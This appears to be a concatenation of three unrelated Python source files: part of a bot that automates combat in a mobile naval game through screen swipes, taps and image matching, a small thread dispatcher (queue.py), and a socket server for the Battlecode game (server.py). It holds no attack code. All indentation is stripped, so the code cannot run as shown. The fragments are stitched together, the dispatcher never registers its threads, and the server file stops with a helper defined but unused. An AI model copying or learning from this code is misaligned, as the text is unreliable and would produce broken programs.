Utils.touch_randomly(self.region["fleet_lock"])
Logger.log_warning("Fleet lock is not supported, disabling it.")
Utils.wait_update_screen()
#swipe map to fit everything on screen
swipes = {
'E-A2': lambda: Utils.swipe(960, 540, 960, 580, 300),
'E-A3': lambda: Utils.swipe(960, 540, 960, 500, 300),
'E-B3': lambda: Utils.swipe(1040, 640, 960, 440, 300),
'E-C2': lambda: Utils.swipe(960, 540, 960, 580, 300),
'E-C3': lambda: Utils.swipe(960, 540, 960, 500, 300),
'E-D3': lambda: Utils.swipe(1040, 640, 960, 440, 300),
'7-2': lambda: Utils.swipe(960, 540, 400, 600, 300),
'12-2': lambda: Utils.swipe(1000, 570, 1300, 540, 300),
'12-3': lambda: Utils.swipe(1250, 530, 1300, 540, 300),
'12-4': lambda: Utils.swipe(960, 300, 960, 540, 300),
'13-1': lambda: Utils.swipe(1020, 500, 1300, 540, 300),
'13-2': lambda: Utils.swipe(1125, 550, 1300, 540, 300),
'13-3': lambda: Utils.swipe(1150, 510, 1300, 540, 300),
'13-4': lambda: Utils.swipe(1200, 450, 1300, 540, 300)
}
swipes.get(self.chapter_map, lambda: Utils.swipe(960, 540, 450, 540, 300))()
# disable subs' hunting range
if self.config.combat["hide_subs_hunting_range"]:
Utils.script_sleep(0.5)
Utils.touch_randomly(self.region["open_strategy_menu"])
Utils.script_sleep()
Utils.touch_randomly(self.region["disable_subs_hunting_radius"])
Utils.script_sleep()
Utils.touch_randomly(self.region["close_strategy_menu"])
target_info = self.get_closest_target(self.blacklist)
while True:
Utils.update_screen()
if Utils.find("combat/alert_unable_battle"):
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 5
if self.config.combat['retreat_after'] != 0 and self.combats_done >= self.config.combat['retreat_after']:
Logger.log_msg("Retreating after defeating {} enemies".format(self.config.combat['retreat_after']))
self.exit = 2
if self.exit != 0:
self.retreat_handler()
return True
if self.kills_count >= self.kills_before_boss[self.chapter_map] and Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9):
Logger.log_msg("Boss fleet was found.")
if self.config.combat['boss_fleet']:
s = 0
swipes = {
0: lambda: Utils.swipe(960, 240, 960, 940, 300),
1: lambda: Utils.swipe(1560, 540, 260, 540, 300),
2: lambda: Utils.swipe(960, 940, 960, 240, 300),
3: lambda: Utils.swipe(260, 540, 1560, 540, 300)
}
Utils.touch_randomly(self.region['button_switch_fleet'])
Utils.wait_update_screen(2)
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
if self.chapter_map == 'E-B3' or self.chapter_map == 'E-D3':
# sometimes the fleet marker blocks the view of the boss icon
# moving the boss fleet first to the right and then to the left
# to get a clear view of the boss
counter = 1
self.fleet_location = [960, 540]
while not boss_region:
if counter % 2 != 0:
Utils.touch([self.fleet_location[0] + (counter % 5) * 200, self.fleet_location[1]])
self.fleet_location[0] += (counter % 5) * 200
else:
Utils.touch([self.fleet_location[0] - (counter % 5) * 200, self.fleet_location[1]])
self.fleet_location[0] -= (counter % 5) * 200
Utils.wait_update_screen()
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
counter += 1
if counter == 5: counter += 1
if counter == 10:
# back to starting position
counter = 1
self.fleet_location = [960, 540]
else:
while not boss_region:
if s > 3: s = 0
swipes.get(s)()
Utils.wait_update_screen(0.5)
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss")
s += 1
# swipe to center the boss fleet on the screen
# first calculate the translation vector coordinates
horizontal_translation = 150 if boss_region.x < 960 else - 150
angular_coefficient = -1 * ((540 - boss_region.y)/(960 - boss_region.x))
Utils.swipe(boss_region.x + horizontal_translation, boss_region.y + int(horizontal_translation * angular_coefficient),
960 + horizontal_translation, 540 + int(horizontal_translation * angular_coefficient), 300)
Utils.wait_update_screen()
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
while not boss_region:
# refreshing screen to deal with mist
Utils.wait_update_screen(1)
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
#extrapolates boss_info(x,y,enemy_type) from the boss_region found
boss_info = [boss_region.x + 50, boss_region.y + 25, "boss"]
self.clear_boss(boss_info)
continue
if target_info == None:
target_info = self.get_closest_target(self.blacklist, mystery_node=(not self.config.combat["ignore_mystery_nodes"]))
if target_info:
#tap at target's coordinates
Utils.touch(target_info[0:2])
Utils.update_screen()
else:
continue
if Utils.find("combat/alert_unable_reach", 0.8):
Logger.log_warning("Unable to reach the target.")
if self.config.combat['focus_on_mystery_nodes'] and target_info[2] == "mystery_node":
self.enemies_list.clear()
self.unable_handler(target_info[0:2])
else:
self.blacklist.append(target_info[0:2])
target_info = None
continue
else:
movement_result = self.movement_handler(target_info)
if movement_result == 1:
self.battle_handler()
target_info = None
self.blacklist.clear()
continue
def clear_boss(self, boss_info):
Logger.log_debug("Started boss function.")
self.enemies_list.clear()
self.mystery_nodes_list.clear()
self.blacklist.clear()
self.fleet_location = None
while True:
#tap at boss' coordinates
Utils.touch(boss_info[0:2])
Utils.update_screen()
if Utils.find("combat/alert_unable_reach", 0.8):
Logger.log_msg("Unable to reach boss.")
#handle boss' coordinates
if not self.unable_handler(boss_info[0:2], boss=True):
return
continue
else:
self.movement_handler(boss_info)
if self.battle_handler(boss=True):
self.exit = 1
Logger.log_msg("Boss successfully defeated.")
Utils.script_sleep(3)
return
def get_enemies(self, blacklist=[], boss=False):
sim = 0.99
filter_coordinates = True if len(self.enemies_list) == 0 else False
if blacklist:
Logger.log_info('Blacklist: ' + str(blacklist))
if len(blacklist) > 2:
self.enemies_list.clear()
while not self.enemies_list:
if (boss and len(blacklist) > 4) or (not boss and len(blacklist) > 3) or sim < 0.97:
if self.swipe_counter > 3: self.swipe_counter = 0
swipes = {
0: lambda: Utils.swipe(960, 240, 960, 940, 300),
1: lambda: Utils.swipe(1560, 540, 260, 540, 300),
2: lambda: Utils.swipe(960, 940, 960, 240, 300),
3: lambda: Utils.swipe(260, 540, 1560, 540, 300)
}
swipes.get(self.swipe_counter)()
sim += 0.005
self.swipe_counter += 1
Utils.update_screen()
l1 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] - 3, x[1] - 27], Utils.find_all('enemy/fleet_level', sim - 0.025, useMask=True)))
l1 = [x for x in l1 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L1: " +str(l1))
l2 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 110], Utils.find_all('enemy/fleet_1_down', sim - 0.02)))
l2 = [x for x in l2 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L2: " +str(l2))
l3 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 90], Utils.find_all('enemy/fleet_2_down', sim - 0.02)))
l3 = [x for x in l3 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L3: " +str(l3))
l4 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 125], Utils.find_all('enemy/fleet_3_up', sim - 0.035)))
l4 = [x for x in l4 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L4: " +str(l4))
l5 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 100], Utils.find_all('enemy/fleet_3_down', sim - 0.035)))
l5 = [x for x in l5 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L5: " +str(l5))
l6 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1770), map(lambda x:[x[0] + 75, x[1] + 110], Utils.find_all('enemy/fleet_2_up', sim - 0.025)))
l6 = [x for x in l6 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L6: " +str(l6))
if self.config.combat['siren_elites']:
l7 = Utils.find_siren_elites()
l7 = [x for x in l7 if (not self.filter_blacklist(x, blacklist))]
Logger.log_debug("L7: " +str(l7))
self.enemies_list = l1 + l2 + l3 + l4 + l5 + l6 + l7
else:
self.enemies_list = l1 + l2 + l3 + l4 + l5 + l6
sim -= 0.005
if filter_coordinates:
self.enemies_list = Utils.filter_similar_coords(self.enemies_list)
return self.enemies_list
def get_mystery_nodes(self, blacklist=[], boss=False):
"""Method which returns a list of mystery nodes' coordinates.
"""
if len(blacklist) > 2:
self.mystery_nodes_list.clear()
if len(self.mystery_nodes_list) == 0 and not Utils.find('combat/question_mark', 0.9):
# if list is empty and a question mark is NOT found
return self.mystery_nodes_list
else:
# list has elements or list is empty but a question mark has been found
filter_coordinates = True if len(self.mystery_nodes_list) == 0 else False
sim = 0.95
while not self.mystery_nodes_list and sim > 0.93:
Utils.update_screen()
l1 = filter(lambda x:(x[1] > 242 and x[1] < 1070 and x[0] > 180 and x[0] < 955) or (x[1] > 160 and x[1] < 938 and x[0] > 550 and x[0] < 1790), map(lambda x:[x[0], x[1] + 140], Utils.find_all('combat/question_mark', sim)))
l1 = [x for x in l1 if (not self.filter_blacklist(x, blacklist))]
self.mystery_nodes_list = l1
sim -= 0.005
if filter_coordinates:
self.mystery_nodes_list = Utils.filter_similar_coords(self.mystery_nodes_list)
return self.mystery_nodes_list
def filter_blacklist(self, coord, blacklist):
for y in blacklist:
if abs(coord[0] - y[0]) < 40 and abs(coord[1] - y[1]) < 40:
return True
return False
def get_fleet_location(self):
"""Method to get the fleet's current location. Note it uses the green
fleet marker to find the location but returns around the area of the
feet of the flagship
Returns:
array: An array containing the x and y coordinates of the fleet's
current location.
"""
if not self.fleet_location:
coords = [0, 0]
count = 0
while coords == [0, 0]:
Utils.update_screen()
count += 1
if count > 4:
Utils.swipe(960, 540, 960, 540 + 150 + count * 20, 100)
Utils.update_screen()
if Utils.find('combat/fleet_ammo', 0.8):
coords = Utils.find('combat/fleet_ammo', 0.8)
coords = [coords.x + 140, coords.y + 225 - count * 20]
elif Utils.find('combat/fleet_arrow', 0.9):
coords = Utils.find('combat/fleet_arrow', 0.9)
coords = [coords.x + 25, coords.y + 320 - count * 20]
if count > 4:
Utils.swipe(960, 540 + 150 + count * 20, 960, 540, 100)
elif (math.isclose(coords[0], 160, abs_tol=30) & math.isclose(coords[1], 142, abs_tol=30)):
coords = [0, 0]
self.fleet_location = coords
return self.fleet_location
def get_closest_target(self, blacklist=[], location=[], mystery_node=False, boss=False):
"""Method to get the enemy closest to the specified location. Note
this will not always be the enemy that is actually closest due to the
asset used to find enemies and when enemies are obstructed by terrain
or the second fleet
Args:
blacklist(array, optional): Defaults to []. An array of
coordinates to exclude when searching for the closest enemy
location(array, optional): Defaults to []. An array of coordinates
to replace the fleet location.
Returns:
array: An array containing the x and y coordinates of the closest
enemy to the specified location
"""
fleet_location = self.get_fleet_location()
if location == []:
location = fleet_location
if mystery_node and self.chapter_map[0].isdigit():
mystery_nodes = self.get_mystery_nodes(blacklist, boss)
if self.config.combat['focus_on_mystery_nodes'] and len(mystery_nodes) > 0:
# giving mystery nodes top priority and ignoring enemies
targets = mystery_nodes
Logger.log_info("Prioritizing mystery nodes.")
else:
# mystery nodes are valid targets, same as enemies
enemies = self.get_enemies(blacklist, boss)
targets = enemies + mystery_nodes
else:
# target only enemy mobs
targets = self.get_enemies(blacklist, boss)
closest = targets[Utils.find_closest(targets, location)[1]]
Logger.log_info('Current location is: {}'.format(fleet_location))
Logger.log_info('Targets found at: {}'.format(targets))
Logger.log_info('Closest target is at {}'.format(closest))
if closest in self.enemies_list:
x = self.enemies_list.index(closest)
del self.enemies_list[x]
target_type = "enemy"
else:
x = self.mystery_nodes_list.index(closest)
del self.mystery_nodes_list[x]
target_type = "mystery_node"
return [closest[0], closest[1], target_type]
def check_movement_threads(self):
thread_list = []
# essential threads
thread_check_alert_info = Thread(
target=self.check_movement_threads_func, args=("menu/alert_info",))
thread_check_menu_formation = Thread(
target=self.check_movement_threads_func, args=("combat/menu_formation",))
thread_check_menu_loading = Thread(
target=self.check_movement_threads_func, args=("combat/menu_loading",))
thread_list.extend([thread_check_alert_info, thread_check_menu_formation, thread_check_menu_loading])
# threads needed for non-event maps (where mystery nodes appears)
if self.chapter_map[0].isdigit():
thread_check_alert_ammo = Thread(
target=self.check_movement_threads_func, args=("combat/alert_ammo_supplies",))
thread_check_item_found = Thread(
target=self.check_movement_threads_func, args=("menu/item_found",))
thread_list.extend([thread_check_alert_ammo, thread_check_item_found])
# threads needed for story maps without clearing mode enabled
if not self.config.combat['clearing_mode']:
thread_check_button_evade = Thread(
target=self.check_movement_threads_func, args=("combat/button_evade",))
thread_check_failed_evade = Thread(
target=self.check_movement_threads_func, args=("combat/alert_failed_evade",))
thread_list.extend([thread_check_button_evade, thread_check_failed_evade])
Utils.multithreader(thread_list)
return self.movement_event
def check_movement_threads_func(self, event):
self.movement_event[event] = (
True
if (Utils.find(event))
else False)
|
queue.py
|
import queue
import threading
from queue import Queue
def dispatcher():
queues = []
handles = []
def reg(fn):
q = Queue()
queues.append(q)
t = threading.Thread(target=fn, args=(q,))
def run():
for t in handles:
t.start()
return reg, run
reg, run = dispatcher()
def handle(q:Queue):
while True:
data = q.get()
if data:
pass
reg(handle)
run()
|
server.py
|
#!/bin/python3
'''
This starts the socket server to which things connect to play the game
'''
import socketserver
import socket # pylint: disable=unused-import
import threading
import time
import random
import sys
import logging
import os.path
try:
import ujson as json
except:
import json
import battlecode as bc
NUM_PLAYERS = 4
PKEYS = {
int(bc.Planet.Earth): {
int(bc.Team.Red): 0,
int(bc.Team.Blue): 1,
},
int(bc.Planet.Mars): {
int(bc.Team.Red): 2,
int(bc.Team.Blue): 3,
}
}
def _key(p):
p = p['player']
return PKEYS[int(p.planet)][int(p.team)]
BUILD_TIMEOUT = 60
TIMEOUT = 50 # seconds
class TimeoutError(Exception):
pass
class Game(object): # pylint: disable=too-many-instance-attributes
'''
This function contains the game information, and is started at the begining
of the process
It handles talking to the rust engine, and sending data to the client.
This class also processes the received data from the client, but the actual
reception is done by the ReceiveHandler and socket server
'''
def __init__(self, game_map: bc.GameMap, logging_level=logging.DEBUG,
logging_file="server.log", time_pool=10000, time_additional=50,
terminal_viewer=False, map_name="unknown",
extra_delay=0):
self.terminal_viewer = terminal_viewer
self.extra_delay = extra_delay
self.time_pool = time_pool/1000.
self.time_additional = time_additional/1000.
logging.basicConfig(filename=logging_file, level=logging_level)
'''
Initialize Game object
Args:
num_players: Number of players
state: Start state of game (Note can be snapshot
'''
self.players = [] # Array containing the player ids
# Dict taking player id and giving bool of log in
self.player_logged = {}
# Dict taking player id and giving amount of time left as float
self.times = {}
# List of how many players per team are connected (red,blue).
self.connected_players = [0,0]
self.disconnected = False
# Initialize the players
for index in range(NUM_PLAYERS):
new_id = random.randrange(10**30)
self.players.append({'id':new_id})
self.players[-1]['player'] = bc.Player(bc.Team.Red if index % 2 == 0 else bc.Team.Blue, bc.Planet.Earth if index < 2 else bc.Planet.Mars)
self.players[-1]['running_stats'] = {
"tl": time_pool,
"atu": 0,
"lng": "?",
"bld": True
}
self.players[-1]['built_successfully'] = False
self.player_logged[new_id] = False
self.times[new_id] = self.time_pool
self.started = False
self.game_over = False
# Lock thread running player should hold
self.current_player_index = 0
self.turn_events = [threading.Event() for _ in range(len(self.players))]
self.map = game_map
self.manager = bc.GameController.new_manager(self.map)
for player in self.players:
player['start_message'] = self.manager.start_game(player['player']).to_json()
self.viewer_messages = []
manager_start_message = self.manager.initial_start_turn_message(int(1000 * self.time_pool))
self.manager_viewer_messages = []
self.manager_viewer_messages.append(self.manager.manager_viewer_message())
self.last_message = manager_start_message.start_turn.to_json()
self.viewer_messages.append(manager_start_message.viewer.to_json())
self.initialized = 0
self.map_name = map_name
self.start_time = time.time()
def state_report(self):
name = self.map_name
if '/' in name:
name = name[name.rfind('/') + 1:]
if '.' in name:
name = name[:name.find('.')]
game = {
"id": 0, #unknown
"map": name,
"round": self.manager.round(),
"time": int((time.time() - self.start_time) * 1000),
"red": {
"id": 0,
},
"blue": {
"id": 0,
}
}
for player in self.players:
p = player["player"]
t = "red" if p.team == bc.Team.Red else "blue"
p = "earth" if p.planet == bc.Planet.Earth else "mars"
game[t][p] = player["running_stats"]
return game
def player_id2index(self, client_id):
for i in range(len(self.players)):
if self.players[i]['id'] ==client_id:
return i
raise Exception("Invalid id")
def get_player(self, client_id):
return self.players[self.player_id2index(client_id)]
def player_connected(self, client_id):
index = self.player_id2index(client_id)
self.connected_players[index%2] = self.connected_players[index%2] + 1
@property
def num_log_in(self):
'''
Returns the number of people who have been logged in
'''
total = 0
for key in self.player_logged:
if self.player_logged[key]:
total += 1
return total
def verify_login(self, unpacked_data: str):
'''
This function verifies the login and then logins in the player code.
Adds them to the game state
Args:
data: A socket that we received data from the client on
Return:
Boolean if login was successful
'''
client_id = int(unpacked_data['client_id'])
# Check if they are in our list of clients
if client_id not in [player['id'] for player in self.players]:
return "Client id Mismatch"
# Check if they logged in already
if self.player_logged[client_id]:
return "Already Logged In"
self.player_logged[client_id] = True
# Check if all the players are logged in and then start the game
logging.info("Player logged in: %s", self.player_logged)
if len(self.players) == self.num_log_in:
self.start_game()
return client_id
def set_player_turn(self, player_index):
self.current_player_index = player_index
self.turn_events[player_index].set()
def start_game(self):
'''
This code handles starting the game. Anything that is meant to be
triggered when a game starts is stored here.
'''
if self.terminal_viewer and sys.platform != 'win32':
# Clear the entire screen
sys.stdout.write("\033[2J")
# Init the player who starts and then tell everyone we started
self.current_player_index = 0
self.set_player_turn(self.current_player_index)
self.started = True
return
def end_turn(self):
'''
This function handles the release of all locks and moving the player to
the next turn. It also handles sleeping the docker instances.
Args:
client_id: The int of the client that this thread is related to
'''
if self.terminal_viewer:
if sys.platform == 'win32':
# Windows terminal only supports escape codes starting from Windows 10 in the 'Threshold 2' update.
# So fall back to other commands to ensure compatibility
os.system('cls')
else:
# Move the cursor to coordinate (0,0) on the screen.
# Compared the clearing the entire screen, this reduces flicker.
# See https://en.wikipedia.org/wiki/ANSI_escape_code
sys.stdout.write("\033[0;0H")
# os.system('clear')
print('[rnd: {}] [rK: {}] [bK: {}]'.format(
self.manager.round(),
self.manager.manager_karbonite(bc.Team.Red),
self.manager.manager_karbonite(bc.Team.Blue),
))
self.manager.print_game_ansi()
if sys.platform != 'win32':
# Clear the screen from the cursor to the end of the screen.
# Just in case some text has been left over there from earlier frames.
sys.stdout.write("\033[J")
for player in sorted(self.players, key=_key):
p = player['player']
print('-- [{}{}] --'.format('e' if p.planet == bc.Planet.Earth else 'm', 'r' if p.team == bc.Team.Red else 'b'))
logs = player['logger'].logs.getvalue()[-1000:].splitlines()[-5:]
for line in logs:
print(line)
if self.extra_delay:
import time
time.sleep(self.extra_delay / 1000.)
# Increment to the next player
self.current_player_index = (self.current_player_index + 1) % len(self.players)
self.set_player_turn(self.current_player_index)
def get_viewer_messages(self):
'''
A generator for the viewer messages
'''
# TODO check this works with the way the engine works
max_yield_item = 0
while not self.game_over or max_yield_item != len(self.viewer_messages):
if len(self.viewer_messages) > max_yield_item:
new_max = len(self.viewer_messages)
for i in range(max_yield_item, new_max):
yield self.viewer_messages[i]
max_yield_item = new_max
time.sleep(0.1)
def start_turn(self, client_id: int):
'''
This is a blocking function that waits until it client_id's turn to
start the game. It attempts to take the game lock and then checks to see
if the client_id matches the next player id. If it does it returns and
the player can start running.
This also handles waking the docker instances to start computing
'''
logging.debug("Client %s: entered start turn", client_id)
exit_well = False
player_index = self.player_id2index(client_id)
while not self.game_over:
if self.turn_events[player_index].wait(timeout=0.1):
self.turn_events[player_index].clear()
assert(self.current_player_index == player_index)
self.times[client_id] += self.time_additional
return True
return False
def make_action(self, turn_message: bc.TurnMessage, client_id: int, diff_time: float):
'''
Take action data and give it to the engine
Args:
data: the data received from the stream
'''
# get the time left of the next player to go
next_index = (self.player_id2index(client_id) + 1) % len(self.players)
next_client_id = self.players[next_index]['id']
projected_time_ms = int(1000 * (self.times[next_client_id] + self.time_additional))
# interact with the engine
application = self.manager.apply_turn(turn_message, projected_time_ms)
self.last_message = application.start_turn.to_json()
self.viewer_messages.append(application.viewer.to_json())
self.manager_viewer_messages.append(self.manager.manager_viewer_message())
self.times[client_id] -= diff_time
return
def create_receive_handler(game: Game, dockers, use_docker: bool,
is_unix_stream: bool) \
-> socketserver.BaseRequestHandler:
'''
Create a Class that will be used a receive handler
Args:
game: The game the receive handler should operate on
dockers: A map of the docker files with the key being
use_docker: if True sleep and wake with docker otherwise don't use
docker. Useful for testing the socket server
Return:
A ReceiveHandler class
'''
class ReceiveHandler(socketserver.BaseRequestHandler):
'''
This class overrides the default handling method in socketServer, so it
calls what we want
'''
def __init__(self, *args, **kwargs):
'''
Hidden init
'''
self.game = game
self.dockers = dockers
self.client_id = 0
self.error = ""
self.logged_in = False
self.is_unix_stream = is_unix_stream
self.buffer_small = b''
self.buffer_large = []
super(ReceiveHandler, self).__init__(*args, **kwargs)
def read_line(self):
while True:
if self.buffer_small:
pos = self.buffer_small.find(b'\n')
if pos != -1:
ret = b''.join(self.buffer_large) + self.buffer_small[:pos]
self.buffer_small = self.buffer_small[pos+1:]
self.buffer_large = []
return ret
else:
self.buffer_large.append(self.buffer_small)
self.buffer_small = self.request.recv(4096)
if not self.buffer_small:
raise IOError("reached socket EOF before finding newline")
def get_next_message(self) -> object:
'''
Returns the json loaded object of the next string that is sent over the
socket
Returns:
An object, for our purposes this will be a dictionary, of the json
loaded string
'''
recv_socket = self.request
game = self.game
logging.debug("Client %s: Waiting for next message", self.client_id)
try:
data = self.read_line()
except (StopIteration, IOError):
print("{} has not sent message for {} seconds, assuming they're dead".format(
self.game.get_player(self.client_id)['player'],
TIMEOUT
))
recv_socket.close()
if bc.Team.Red == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player2'
elif bc.Team.Blue == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player1'
else:
if self.game.connected_players[0] == self.game.connected_players[1]:
print("Determining match by coin toss.")
self.game.winner = 'player1' if random.random() > 0.5 else 'player2'
else:
self.game.winner = 'player1' if self.game.connected_players[0] > self.game.connected_players[1] else 'player2'
self.game.disconnected = True
self.game.game_over = True
raise TimeoutError()
except KeyboardInterrupt:
recv_socket.close()
if bc.Team.Red == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player2'
elif bc.Team.Blue == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player1'
else:
if self.game.connected_players[0] == self.game.connected_players[1]:
print("Determining match by coin toss.")
self.game.winner = 'player1' if random.random() > 0.5 else 'player2'
else:
self.game.winner = 'player1' if self.game.connected_players[0] > self.game.connected_players[1] else 'player2'
self.game.disconnected = True
self.game.game_over = True
raise KeyboardInterrupt()
data = data.decode("utf-8").strip()
return data
#unpacked_data = json.loads(data)
#return unpacked_data
def send_message(self, obj: object) -> None:
'''
Sends newline delimited message to socket
The object desired to be sent will be converted to a json and then encoded
and sent.
Args:
Obj: The object that wants to be serialized and sent over
Returns:
None
'''
send_socket = self.request
if isinstance(obj, bytes):
obj = obj.decode()
message = obj + "\n"
encoded_message = message.encode()
logging.debug("Client %s: Sending message %s", self.client_id,
encoded_message)
try:
self.request.sendall(encoded_message)
except IOError:
send_socket.close()
print("{} has not accepted message for {} seconds, assuming they're dead".format(
[p for p in self.game.players if p['id'] == self.client_id][0]['player'],
TIMEOUT
))
if bc.Team.Red == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player2'
elif bc.Team.Blue ==self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player1'
else:
if self.game.connected_players[0] == self.game.connected_players[1]:
print("Determining match by coin toss.")
self.game.winner = 'player1' if random.random() > 0.5 else 'player2'
else:
self.game.winner = 'player1' if self.game.connected_players[0] > self.game.connected_players[1] else 'player2'
self.game.disconnected = True
self.game.game_over = True
raise TimeoutError()
except KeyboardInterrupt:
send_socket.close()
if bc.Team.Red == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player2'
elif bc.Team.Blue ==self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player1'
else:
if self.game.connected_players[0] == self.game.connected_players[1]:
print("Determining match by coin toss.")
self.game.winner = 'player1' if random.random() > 0.5 else 'player2'
else:
self.game.winner = 'player1' if self.game.connected_players[0] > self.game.connected_players[1] else 'player2'
self.game.disconnected = True
self.game.game_over = True
raise KeyboardInterrupt()
return
def message(self, state_diff):
'''
Compress the current state into a message that will be sent to the
client
'''
if self.error == "":
error = "null"
else:
self.docker.destroy()
if state_diff == "":
state_diff = '""'
if isinstance(state_diff, bytes):
state_diff = state_diff.decode()
if self.logged_in:
logged_in = "true"
else:
logged_in = "false"
message = '{{"logged_in":{},"client_id":"{}","error":{},"message":{}}}'.format(logged_in, self.client_id, error, state_diff)
return message
def player_handler(self):
'''
This is the handler for socket connections from players
'''
self.logged_in = False
logging.debug("Client connected to server")
self.request.settimeout(TIMEOUT)
TIMEDOUTLOG = False
# Handle Login phase
while not self.logged_in and not self.game.game_over:
# do the json parsing ourself instead of handing it off to rust
unpacked_data = json.loads(self.get_next_message())
verify_out = self.game.verify_login(unpacked_data)
self.error = ""
if not isinstance(verify_out, int):
self.error = verify_out
logging.warning("Client failed to log in error: %s",
self.client_id)
else:
logging.info("Client %s: logged in succesfully", self.client_id)
self.logged_in = True
self.client_id = verify_out
self.game.player_connected(self.client_id)
self.game.get_player(self.client_id)['built_successfully'] = True
log_success = self.message("")
self.send_message(log_success)
if self.game.game_over:
return
logging.debug("Client %s: Spinning waiting for game to start",
self.client_id)
while not self.game.started and not self.game.game_over:
# Spin while waiting for game to start
time.sleep(0.05)
logging.info("Client %s: Game started", self.client_id)
my_sandbox = dockers[self.client_id]
running_stats = self.game.get_player(self.client_id)['running_stats']
# average time used, in seconds
atu = 0
while self.game.started and not self.game.game_over:
# This is the loop that the code will always remain in
# Blocks until it this clients turn
if not self.game.start_turn(self.client_id):
self.request.close()
return
if self.game.manager.is_over():
self.game.game_over = True
self.game.end_turn()
self.request.close()
return
logging.debug("Client %s: Started turn", self.client_id)
if self.game.initialized > 3:
start_turn_msg = self.message(self.game.last_message)
else:
state_diff = self.game.players[self.game.current_player_index]['start_message']
start_turn_msg = self.message(state_diff)
running_stats["lng"] = my_sandbox.guess_language()
running_stats["bld"] = False
if self.game.initialized <= 3:
my_sandbox.unpause()
self.send_message(start_turn_msg)
self.game.initialized += 1
self.game.end_turn()
continue
if self.game.times[self.client_id] > 0:
my_sandbox.unpause()
start_time = time.perf_counter()
start_time_python = time.process_time()
self.send_message(start_turn_msg)
data = self.get_next_message()
end_time_python = time.process_time()
end_time = time.perf_counter()
diff_time = (end_time - start_time) - (end_time_python - start_time_python)
my_sandbox.pause()
try:
sent_message = bc.SentMessage.from_json(data)
except Exception as e:
print("Error deserializing JSON")
print(e)
print("Killing player...")
if bc.Team.Red == self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player2'
elif bc.Team.Blue ==self.game.get_player(self.client_id)['player'].team:
self.game.winner = 'player1'
else:
if self.game.connected_players[0] == self.game.connected_players[1]:
print("Determining match by coin toss.")
self.game.winner = 'player1' if random.random() > 0.5 else 'player2'
else:
self.game.winner = 'player1' if self.game.connected_players[0] > self.game.connected_players[1] else 'player2'
self.game.disconnected = True
self.game.game_over = True
assert int(sent_message.client_id) == self.client_id, \
"Wrong client id: {}, should be: {}".format(sent_message.client_id, self.client_id)
turn_message = sent_message.turn_message
else:
if not TIMEDOUTLOG:
TIMEDOUTLOG = True
self.game.players[self.game.current_player_index]['logger'](b'PLAYER HAS TIMED OUT!!!')
# 1 second; never let them play again
diff_time = 1
turn_message = bc.TurnMessage.from_json('{"changes":[]}')
atu = atu * .9 + diff_time * .1
# convert to ms
running_stats["tl"] = int(self.game.times[self.client_id] * 1000)
running_stats["atu"] = int(atu * 1000)
self.game.make_action(turn_message, self.client_id, diff_time)
self.game.end_turn()
def viewer_handler(self):
'''
This handles the connection to the viewer
'''
for message in self.game.get_viewer_messages():
# TODO check this schema works for the viewer
self.send_message(message)
def handle(self):
'''
This does all the processing of the data we receive and we spend our
time in this function.
'''
if self.is_unix_stream:
try:
self.player_handler()
except TimeoutError:
return
else:
self.viewer_handler()
return ReceiveHandler
def start_server(sock_file: str, game: Game, dockers, use_docker=True) -> socketserver.BaseServer:
'''
Start a socket server for the players to connect to
Args:
sock_file: This is a string name of the file that will be used for
as UnixStream
game: The game information that is being run
use_docker bool: whether to use docker or not
Return:
server_thread: The connection so it can be closed by parent functions at
the appropriate time
'''
# Create handler for mangaing each connections to server
receive_handler = create_receive_handler(game, dockers, use_docker, True)
if isinstance(sock_file, tuple):
# tcp port
server = socketserver.ThreadingTCPServer(sock_file, receive_handler)
else:
server = socketserver.ThreadingUnixStreamServer(sock_file, receive_handler)
def wait_for_connections():
time.sleep(BUILD_TIMEOUT)
for player in game.players:
if not player['built_successfully']:
print('Player failed to connect to manager after',BUILD_TIMEOUT,'seconds:', player['player'])
if bc.Team.Red == player['player'].team:
game.winner = 'player2'
else:
game.winner = 'player1'
game.disconnected = True
game.game_over = True
server_thread = threading.Thread(target=server.serve_forever, daemon=True)
logging.info("Server Started at %s", sock_file)
server_thread.start()
